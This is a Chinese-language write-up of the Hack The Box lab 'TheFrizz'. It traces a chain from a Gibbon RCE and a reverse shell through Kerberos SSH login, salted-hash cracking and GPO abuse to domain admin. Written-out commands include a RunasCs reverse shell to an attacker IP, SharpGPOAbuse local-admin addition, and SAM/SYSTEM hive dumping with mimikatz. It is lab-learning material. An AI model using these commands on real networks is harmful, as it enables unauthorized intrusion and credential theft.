HTB_TheFrizz
windows(insane)
总结
user.txt
gibbon的一个未授权rce CVE-2023-45878->反弹shell->config.php获取密码->kerberos登录ssh->f.frizzle
1.我当时反弹shell不成功,powershell -e不识别,nc的话必须结束掉才能回显内容,用了msf才可以
2.ssh的kerberos登录用法
export ....cache;ssh -o PreferredAuthentications=gssapi-with-mic
-o GSSAPIAuthentication=yes
[email protected]3.加盐的sha256爆破
1410 sha256($pass.$salt)
1420 sha256($salt.$pass)root.txt
mysql数据库messager数据信息,提到删除了,想办法恢复,想到$RECYCLE-(可能是回收站没清空)>kali下载文件,分析得到密码->ssh登录M.SchoolBus->洪范配合GPO滥用提权
唯一能产生联系的就是这个WriteGPLink这个OUCLASS_FRIZZ,而它又包含v.frizzle,通过查看管理员命令可以知道v.frizzle是管理员
所以我可以进行关联,只需要找到/新建一个GPO(Domain Controllers OU)可能是权限够大,链接到CLASS_FRIZZ上即可
根据wp
$gpo = New-GPO -Name "EvilPolicy"
New-GPLink -Name "EvilPolicy" -Target "OU=Domain Controllers,DC=frizz,DC=htb"
New-GPLink -Name "EvilPolicy" -Target "OU=CLASS_FRIZZ,DC=frizz,DC=htb"
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "M.SchoolBus" --GPOName "EvilPolicy"
gpupdate /force
net localgroup Administrators本地的话还不可以读root,新开shell的话ssh登不进去了
想到RunasCs反弹shell
./RunasCs.exe M.SchoolBus '?' powershell.exe -r kali_ip:3434嘶,whoami的话名字没变化呢,但其实可以访问root.txt了,注意反弹时不要 -l --remote参数了,否则好像还是读不了
想到
好吧,frizzdc.frizz.htb应该就是域控?毕竟含了个dc,与之前的DC01只是名字不同
nltest /dclist:frizz.htb
Get list of DCs in domain 'frizz.htb' from '\frizzdc.frizz.htb'.
frizzdc.frizz.htb [PDC] [DS] Site: Default-First-Site-Name
The command completed successfully```1.为什么 显示的是 $RECYCLE.BIN,无法cd进去,反而要$Recycle.Bin?
dir -h显示的就是大写,说只是显示成了一个友好名称什么的,和什么机制有关系,和实际文件系统路径不太一样
cp C:$"Recycle.Bin"S-1-$"R???".7z tem1.7z2.SharpGPOAbuse无回显
编译的问题?
https://github.com/FSecureLABS/SharpGPOAbuse
在本机windows使用下发现会报错
重新用VS2019编译生成,出现
Fody.targets(38,12): error MSB4086: 尝试在条件“($(MsBuildMajorVersion) < 16)”中对计算结果为“”而不是数字的“$(MsBuildMajorVersion)”进行数值比较。右键项目属性->目标框架是由3.5换成4.5,之后右键项目,生成Release的即可
可能是之前杀毒报错,把关键东西删除了,导致编译后不能用
后面使用
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount "M.SchoolBus" --GPOName "Default Domain Controllers Policy"
Access to the path '\frizz.htbSysVolfrizz.htbPolicies{6AC1786C-016F-11D2-945F-00C04fB984F9}MachineMicrosoftWindows NTSecEditGptTmpl.inf' is denied.[!] Exiting...发现拒绝了
那只能再洪范分析下了
3.evil-winrm错误
Error: An error of type HTTPClient::ConnectTimeoutError happened, message is execution expired
malloc(): unaligned fastbin chunk detected 可能是winrm服务没开
SAM表获取hash
reg save HKLMSYSTEM SYSTEM
reg save HKLMSAM SAM
#使用mimikatz提取hash
lsadump::sam /sam:SAM /system:SYSTEMhttps://www.cnblogs.com/-mo-/p/11890232.html
参考
wp
https://4xura.com/ctf/htb/htb-writeup-thefrizz
CVE-2023-34598
https://github.com/maddsec/CVE-2023-34598
cve
https://app.opencve.io/cve/?vendor=gibbonedu
CVE-2023-45878
https://herolab.usd.de/security-advisories/usd-2023-0025/
源码
https://github.com/GibbonEdu/core/tree/v25.0.00
kerbrute
https://github.com/ropnop/kerbrute
$RECYCLE.BIN
https://github.com/abelcheung/rifiuti2/releases/download/0.8.1/rifiuti2-0.8.1-win64.zip
这个貌似是可以看删除前的名字和位置的,但不使用这个也没事
SharpGPOAbuse
https://github.com/FSecureLABS/SharpGPOAbuse
RunasCs
https://github.com/antonioCoco/RunasCs
原文始发于微信公众号(羽泪云小栈):HTB_TheFrizz
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论